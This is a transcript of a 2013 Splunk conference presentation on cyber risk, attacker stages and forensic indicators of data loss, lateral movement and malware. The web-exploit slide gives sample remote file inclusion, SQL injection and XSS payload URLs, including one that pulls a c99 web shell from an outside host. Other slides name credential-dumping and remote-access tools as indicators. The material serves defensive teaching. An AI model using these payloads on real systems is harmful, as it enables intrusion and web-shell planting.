cyber&riskand&threat&indicators& - splunkconf · 2017. 10. 13. · • social...
TRANSCRIPT
Cyber Risk and Threat Indicators Shane Shook, PhD
Chief Knowledge Officer and Global Vice President of ConsulBng Cylance
#splunkconf
1
Risk Does Not Equal Threat | Cyber Risks and Threat Indicators
2
3
Malware – Windows / Linux / OSX (31% didn’t use malware) • Dropper/downloaders – Phishing & Waterholing Malware
in Userspace Zero/Single-day Exploits that lead to…
• Backdoor Trojan RATs – Kernel interactive Service Binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)
• BOTNETs – Platforms for MAAS/Subscription Access
• WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)
4
Hacking – .day Exploits
• Zero day • Vulnerability that only the developer knows about
• ½ day • Vulnerability that is known about but no patches are yet available
• Single day • Vulnerability that is known about and patches are available but not
applied
• Forever day • Vulnerability that is known and cannot be patched
5
Hacking – Web Server/Services Exploits
• Remote code execution (watch your .htaccess files!) • register_globals on in PHP | require ($page . ".php"); !http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt
• SQL injection (watch your user privileges!) • AND / OR in SQL $query | $query = "SELECT * FROM users
WHERE username = '' or '1=1'";!http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version),,
• Cross Site Scripting/XSS (watch your syntax!) • Volatile entry in Echo | <?php echo "<p>Your Name <br />";
echo ($_GET[name_1]); ?> !http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>
• Username enumeration (watch your error messages!) • Username guessing | Incorrect logon / password combination
6
Social Engineering – Access, Behavior, and Authority
Subversion • Contractors • Employees
Sabotage • Phishing • Waterholing • USB “HoneyDrops” & other free
hardware • “HelpDesk Operators” • “Visitors” (repairmen, janitors, pizza/
flower delivery, tailgaters)
7
Advanced Persistent Threat – Ac#vi#es
Stage 2 -‐ Exploit • Privilege escalation • Lateral movement • User profile abuse • Remote access
provisioning • Services bypass/
cancellation
Stage 1 -‐ Compromise • Social engineering
backdoors • Phishing / waterholing • Help Desk / visitors
• Web site backdoors • Reconnaissance
Stage 3 -‐ Control • Configuration
management • Data targeting • Data exfiltration • Sabotage • Subversion
8
Most Commonly Seen Indicators of Data Loss: • Non-standard packagers (7z, Gz, RAR, PKZIP, etc.)
• Multipart files of particular sizes (250/500Mb)
• “Recyle”/RecycleBin residue
• HTTP 206 status codes on web servers
• Non-standard file transfer services (Filezilla, FTP, WsFTP, etc.)
• Non-standard reverse/proxy services (HUCs, PLINK, NC, SSH, etc.)
9
Most Commonly Seen Indicators of Sabotage: • Unusual Prefetch / Recent / LNK / Bash binary execution history
• AT / CRON jobs
• Scripts
• Services cancellation
• User profile authority changes
10
Most Commonly Seen Indicators of User Profile Abuse: • Multiple user accounts on single computer
• User account on multiple computers
• Service & administrative account propagation
• Extranet LDAP/AD account use
• Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)
• Local services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)
11
Most Commonly Seen Indicators of Lateral Movement: • Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)
• MSTSC history (.RDP, .BMC)
• Remote job scheduling (AT, SC, WMIC, SSH)
• Redundant & non-standard RAS tools (VNC, LogMeIn, TeamView, NC, PUTTY, PSEXEC, *FTP, SCP)
• Domain services history (DSGET, DSQUERY, HYENA)
• Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)
12
Most Commonly Seen Indicators of Insider Threats: • Unusual profile access and use history
• Time • HostID • Application history • Configuration history
• RBAC violations
• Other acceptable use policy violations
• Malware / PUP / PUM…
13
Most Common Malware Iden#fiers: • Authority – service, administrator, or user
• Persistence – only 4 persistence mechanisms in Windows
• Communications – only 44 netsvcs keys in Windows Services
• Functionality – user and kernel combinations are rare
• File System – user or system
14
Scope of the Investigation
Coverage of the IT Environment
File and Operating System Audit
Network Logs Audit
Host Memory Analysis
Host Disk Forensics
Network Forensics
Phase 1 (Diagnose)
Phase 2 (Assess)
Phase 3 (Collect)
CollecQon
Windows.bat
Linux.sh
OSX.sh
Processing
Presponse.py • ExtracQon • Parsing • NormalizaQon • Transform • Load
Analysis
SQL
Excel PowerPivot
ReporQng
Compromise Assessment
Exhibits
Cylance Presponse™ Method
15
Cylance Infinity – Machine Learning for Advanced DetecBon
16
Cylance Infinity API – Submit Files or Lookup Hashes
17
Presponse on Splunk Splunk Universal Forwarder • Scripted input collection of Presponse Phase 1
data
• Leverage the existing Splunk deployment
• Managed via the Splunk Development Server
Presponse App • Saved searches ü Data loss or sabotage ü User profile propagation ü Lateral movement ü Malware and IOCs ü Build and application
inconsistencies
• Dashboards, form searches and other views
• Field extractions
• Lookups (e.g. Infinity)
SourceTypes • Processes ü Executable path ü Modules ü Handles ü Connections
• Services
• Autoruns
• Tasks
• Prefetch
• Filesystem
• User profiles
18
Infinity External Lookup Add-‐on • Reusable Splunk component that packages an external lookup script based on py2INFINITY • Lookup SHA-256 (and soon MD5) hashes in sourcetypes • Extend with file upload/response capability
19
1. What files are known bad? 2. What files are unknown? 3. Where are the files located in FS? 4. How many computers are they on? 5. When were they created? 6. Who used them?
• Malware is only an indicator, not a threat
• It is a risk that should be evaluated by related user history
• A threat is determined by the impact it had or may have on the business
20
21
22
23
24
25
Risk Threat Unpatched software Vulnerable to exploits “.”day exploit Used in place of malware Malware Used to reconnoiter or sabotage systems Uncontrolled access Persistent access to non-public information Undocumented systems Lack of awareness Tools vs. experience Lack of perspective Outsourcing Lack of control
When is a Risk a Threat?
26
[email protected] | Cyber Risks and Threat Indicators
27
Next Steps
28
1
2
3
Download the .conf2013 Mobile App If not iPhone, iPad or Android, use the Web App
Take the survey & WIN A PASS FOR .CONF2014… Or one of these bags!
Check out the other “Using Splunk” presentaBons All PPTs are in the Mobile App Videos will be uploaded shortly